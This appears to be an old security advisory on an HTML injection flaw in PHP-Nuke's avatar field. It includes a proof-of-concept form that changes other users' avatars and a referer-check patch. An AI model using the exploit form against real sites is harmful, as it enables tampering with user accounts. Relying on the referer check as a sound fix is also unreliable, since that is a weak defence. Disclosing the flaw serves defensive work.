|
|
PHP-Nuke Avatar HTML Injection Vulnerability
This vulnerability may be exploited using a standard web browser. The following code is proof of concept was provided by "delusion" <delusi0n@bellsouth.net> : <!-- START CODE --!> <form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post"> <b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br> <b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form> <!-- END CODE --!> To modify other users avatar information: Search for "saveuser" you should get to a function that looks like this.. function saveuser($uid, $realname, $uname, $email, etc... right underneath the function call, put this in.. $referer = getenv("HTTP_REFERER"); $nukeurl="http://digital-delusions.com"; $nukeurl2="http://digital-delusions.dyn.ee"; $nukeurl3="http://192.168.0.254"; if (substr("$referer",0,strlen($nukeurl))==$nukeurl OR substr("$referer",0,strlen($nukeurl2))==$nukeurl2 OR substr("$referer",0,strlen($nukeurl3))==$nukeurl3) { make sure u change my URLs to your site's urls. [ ... ] Header("Location: modules.php?name=$module_name"); } } } before the last "}" paste this.. } else { echo "delusion ownz j00"; } |
|
Privacy Statement |